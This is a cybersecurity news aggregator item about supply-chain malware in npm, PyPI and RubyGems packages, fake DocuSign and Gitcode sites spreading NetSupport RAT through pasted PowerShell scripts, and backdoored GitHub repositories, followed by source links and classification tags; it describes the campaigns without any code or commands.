CyberSecurity news
FlagThis
drewt@secureworldexpo.com (Drew@SecureWorld News
//
A surge in malicious packages targeting crypto wallets, Telegram tokens, and codebase integrity has been reported across npm, PyPI, and RubyGems, highlighting the persistent vulnerability of the open-source software supply chain. Threat actors are actively exploiting human trust by publishing clones of legitimate software packages. Once installed, these malicious clones execute harmful payloads, ranging from cryptocurrency theft to complete codebase deletion. Researchers have uncovered instances where Telegram API traffic is rerouted to attacker-controlled command-and-control servers, exfiltrating sensitive data like bot tokens, chat IDs, message content, and attached files.
This malicious activity is not limited to package repositories. A sophisticated campaign has been uncovered, utilizing deceptive websites spoofing Gitcodes and Docusign, to trick users into running malicious PowerShell scripts on their Windows machines. These websites lure victims into copying and pasting scripts into the Windows Run prompt, leading to the installation of the NetSupport RAT (Remote Access Trojan). The scripts often employ multi-stage downloaders, retrieving additional payloads from various domains to further compromise the infected system.
Sophos researchers also exposed a large-scale GitHub campaign where backdoored malware was disguised as legitimate tools. This campaign revolved around numerous repositories posing as exploits, game cheats, and open-source tools. Compiling the code triggered infection chains involving VBS scripts, PowerShell downloads, and obfuscated Electron apps, ultimately deploying info-stealers and RATs. These campaigns use various methods of deception, including automated commits to give the impression of active development and obfuscation of payloads to avoid detection, showing the lengths these actors will go to to exploit the software supply chain.
ImgSrc: www.secureworld
References :
This malicious activity is not limited to package repositories. A sophisticated campaign has been uncovered, utilizing deceptive websites spoofing Gitcodes and Docusign, to trick users into running malicious PowerShell scripts on their Windows machines. These websites lure victims into copying and pasting scripts into the Windows Run prompt, leading to the installation of the NetSupport RAT (Remote Access Trojan). The scripts often employ multi-stage downloaders, retrieving additional payloads from various domains to further compromise the infected system.
Sophos researchers also exposed a large-scale GitHub campaign where backdoored malware was disguised as legitimate tools. This campaign revolved around numerous repositories posing as exploits, game cheats, and open-source tools. Compiling the code triggered infection chains involving VBS scripts, PowerShell downloads, and obfuscated Electron apps, ultimately deploying info-stealers and RATs. These campaigns use various methods of deception, including automated commits to give the impression of active development and obfuscation of payloads to avoid detection, showing the lengths these actors will go to to exploit the software supply chain.
ImgSrc: www.secureworld
Share:
References :
- SecureWorld News: Malicious Open-Source Packages Target Crypto Wallets, Telegram Tokens, and Codebases
- The Hacker News: Fake DocuSign, Gitcode Sites Spread NetSupport RAT via Multi-Stage PowerShell Attack
- Catalin Cimpanu: A threat actor compromised 16 npm libraries from the Gluestack UI framework. The attacker compromised a Gluestack admin's account, added a RAT to the libraries, and pushed updates on Friday. It's the same threat actor behind the rand-user-agent package last month.
- securityaffairs.com: SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 48
- The Hacker News: New Supply Chain Malware Operation Hits npm and PyPI Ecosystems, Targeting Millions Globally
- www.linkedin.com: The attacker compromised a Gluestack admin's account, added a RAT to the libraries, and pushed updates on Friday.
- hackread.com: Hidden Backdoors in npm Packages Let Attackers Wipe Entire Systems
- bsky.app: A significant supply chain attack hit NPM after 15 popular Gluestack packages with over 950,000 weekly downloads were compromised to include malicious code that acts as a remote access trojan (RAT).
- BleepingComputer: Supply chain attack hits Gluestack NPM packages with 960K weekly downloads
- www.itpro.com: Developers beware: Malware has been found in a dozen popular NPM packages – here’s what you need to know
Classification:
- HashTags: #SupplyChain #Malware #OpenSource
- Company: Multiple
- Target: Developers, gamers, crypto users
- Product: npm, PyPI, RubyGems
- Feature: package management
- Malware: NetSupport RAT
- Type: Malware
- Severity: HighRisk